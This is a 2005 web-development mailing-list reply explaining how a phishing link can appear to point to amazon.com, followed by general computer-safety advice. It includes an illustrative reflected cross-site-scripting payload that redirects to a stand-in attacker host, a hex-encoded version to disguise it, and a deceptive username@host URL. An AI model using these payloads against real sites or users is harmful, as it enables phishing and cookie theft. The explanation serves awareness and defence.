[thelist] phishing and urls

Chris at globet.com Chris at globet.com
Fri Sep 9 12:23:12 CDT 2005 

Laura

> This morning I got a phishing email supposedly from amazon.com.
> 
> I knew it was phishing, of course, because it had that famous 
> line "your account will close within 24 hours unless you 
> click on his link and verify your information".
> 
> What scared me particularly on this phish was this - I 
> clicked on the link 

I would advise that if you know that a link is provided in malice,
curiosity should be outweighed by caution. It doesn't matter what you
think you know, if you're about to become the victim of a 0-day exploit.

> (I often check to see where a phisher 
> wants to take me, and the url given was definately an 
> amazon.com address! (Many phishers will lead you to a 

When you say that it was definitely an Amazon.com address, 1) was the
URI under the amazon.com domain, or s) did the URI have the string
"amazon.com" in it (possibly at the beginning) somewhere.

If:

1) There is a possibility (probably remote with an organisation like
Amazon.com) that their website is vulnerable to a cross-site scripting
vulnerability. 

Example: The the target website has an account login system. When a user
logs out, they are redirected to the target website home page. A message
is displayed which reads "Thank you for logging out". The message is
passed via the query string, so the URI is constructed thus:
http://example.example/default.asp?message=Thank+you+for+logging+out. An
attacker can now insert script into html page that is sent to a user as
an HTTP response if they can persuade the user to click on a link. Thus,
a malicious URI might be constructed thus:
http://example.example/default.asp?message=<script>document.location='ma
l.example/default.asp'</script>. It seems pretty clear what is going on
here, but if we convert the query string to hex, it looks like this:
<http://example.example/default.asp?6D6573736167653D3C7363726970743E646F
63756D656E742E6C6F636174696F6E3D276D616C2E6578616D706C652F64656661756C74
2E617370273C2F7363726970743E>. This would appear to be far less
suspicious, in my opinion. If the link is clicked on, the user is
directed to the attacker's website. They can then be directed straight
back to the target website without the user being any the wiser. Bearing
in mind that attacker can pick up the cookie values from the target
website on the way, and deliver them to himself via the querystring,
this is not cool.

2) The protocol for logging into a website directly is (or used to be,
at least) http://username:password@domain.tld/. If a non-existent
username is specified, the anonymous web user account may be used. Thus,
we could use the link http://amazon.com:password@mal.example/.

Both of the above "exploits" are well known, so most websites *should*
not be susceptible to them.

[..]

> 4. I thought you would be safe from viruses and unautthorized 
> changes to your system if you don't click on any attachments. 
> How does an email transfer a virus or a command if you don't 
> click on an attachment? What are the new rules for keeping 
> your computer safe?

Don't connect it to the interweb? Other than that, install a firewall
and disable *everything*. Then, only enable what you need - and
understand why you need it otherwise leave it disabled. Keep your virus
definitions up to date. Don't let curiosity get the better of you - if
you know that something is malicious, totally avoid it. Assuming you're
on a Windows machine, buy a copy of Norton Ghost. Keep your data on a
separate partition to your OS and applications, and take regular Ghost
backups of your system partition. Then, if something Bad happens, you
should be able to yank the plug, and restore your system partition from
the Ghost image. Of course, your data partition could still be corrupted
- but you can cross that bridge when you come to it.

HTH

Chris Marsh
Web Developer
http://www.globet.com/
Tel: +44 20 8246 4804 Ext 828
Fax: +44 20 8246 4808

Any opinions expressed in this email are those of the individual and not
necessarily the Company. This message is intended for the use of the
individual or entity to which it is addressed and may contain
information that is confidential and privileged and exempt from
disclosure under applicable law. If the reader of this message is not
the intended recipient, you are hereby notified that any dissemination,
distribution, or copying of this communication is strictly prohibited.
If you have received this communication in error, please contact the
sender immediately and delete it from your system.

More information about the thelist mailing list